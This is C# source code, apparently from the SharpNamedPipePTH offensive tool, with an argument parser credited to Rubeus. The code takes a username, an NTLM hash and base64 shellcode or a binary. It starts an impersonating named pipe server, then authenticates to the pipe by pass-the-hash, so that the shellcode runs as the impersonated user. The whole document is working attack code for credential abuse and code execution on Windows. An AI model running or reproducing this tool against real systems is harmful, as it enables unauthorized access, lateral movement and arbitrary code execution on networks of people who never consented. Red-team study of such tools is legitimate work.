//Argument parsing class from Rubeus (https://github.com/GhostPack/Rubeus/) //Author: @Harmj0y public static ArgumentParserResult Parse(IEnumerable <string> args) { var arguments = new Dictionary <string, string>(); try { foreach (var argument in args) { var idx = argument.IndexOf(':'); if (idx > 0) { arguments[argument.Substring(0, idx).ToLower()] = argument.Substring(idx + 1); } else if (argument.ToLower() == "-debug") { arguments["debugging"] = "true"; } else if (argument.ToLower() == "-h") { arguments["showhelp"] = "true"; } else if (argument.ToLower() == "-help") { arguments["showhelp"] = "true"; } else if (argument.ToLower() == "-checkadmin") { arguments["admincheck"] = "true"; } else if (argument.ToLower() == "-forcesmb1") { arguments["forcesmb1"] = "true"; } else if (argument.ToLower() == "-smb1") { arguments["forcesmb1"] = "true"; } else if (argument.ToLower() == "-comspec") { arguments["comspec"] = "true"; } else { arguments[argument] = string.Empty; } } return(ArgumentParserResult.Success(arguments)); } catch (System.Exception ex) { Console.WriteLine(ex.Message); return(ArgumentParserResult.Failure()); } }
public static void Main(string[] args) { //User Set string username = ""; string domain = "."; string pipename = "ShitSecure"; string hash = ""; bool ForceSMB1 = false; string binary = ""; string shellcode = ""; bool usernamegiven = false; bool hashgiven = false; bool shellcodegiven = false; bool binarygiven = false; try { if (args.Length < 1) { displayHelp("Usage:"); return; } ArgumentParserResult arguments = ArgParse.Parse(args); if (arguments.ParsedOk == false) { displayHelp("Error Parsing Arguments"); return; } if (arguments.Arguments.ContainsKey("showhelp")) { displayHelp("Usage:"); return; } if (arguments.Arguments.ContainsKey("-h")) { displayHelp("Usage:"); return; } if (arguments.Arguments.ContainsKey("pipename")) { pipename = arguments.Arguments["pipename"]; } if (arguments.Arguments.ContainsKey("shellcode")) { shellcode = arguments.Arguments["shellcode"]; shellcodegiven = true; } if (arguments.Arguments.ContainsKey("binary")) { binary = arguments.Arguments["binary"]; binarygiven = true; } if (arguments.Arguments.ContainsKey("forcesmb1")) { ForceSMB1 = true; } if (arguments.Arguments.ContainsKey("hash")) { hash = arguments.Arguments["hash"]; hashgiven = true; } if (arguments.Arguments.ContainsKey("username")) { username = arguments.Arguments["username"]; usernamegiven = true; } if (arguments.Arguments.ContainsKey("domain")) { domain = arguments.Arguments["domain"]; } if (!(usernamegiven && hashgiven && (shellcodegiven || binarygiven))) { Console.WriteLine(usernamegiven); Console.WriteLine(hashgiven); Console.WriteLine(shellcodegiven); Console.WriteLine(binarygiven); displayHelp("Usage:"); return; } } catch { displayHelp("Error Parsing Arguments"); return; } //Change WINSTA/DESKTOP Permissions GrantAccessToWindowStationAndDesktop(username); // Start Pipe Server Console.WriteLine("Starting Pipe Server Thread!"); if (shellcodegiven) { byte[] shellcodebytes = Convert.FromBase64String(shellcode); Thread t = new Thread(() => SharpNamedPipePTH.PipeServerImpersonate.ImpersonateClient(pipename, binary, shellcodebytes)); t.Start(); } else { byte[] shellcodebytes = null; Thread t = new Thread(() => SharpNamedPipePTH.PipeServerImpersonate.ImpersonateClient(pipename, binary, shellcodebytes)); t.Start(); } // Connect to the Named Pipe via NamedPipePTH Console.WriteLine($"Connecting to the Named Pipe via Pass-the-Hash - using username {username}"); Thread.Sleep(4000); SharpNamedPipePTH.NamedpipePTH.NamedPipePTH(username, domain, hash, pipename, ForceSMB1); }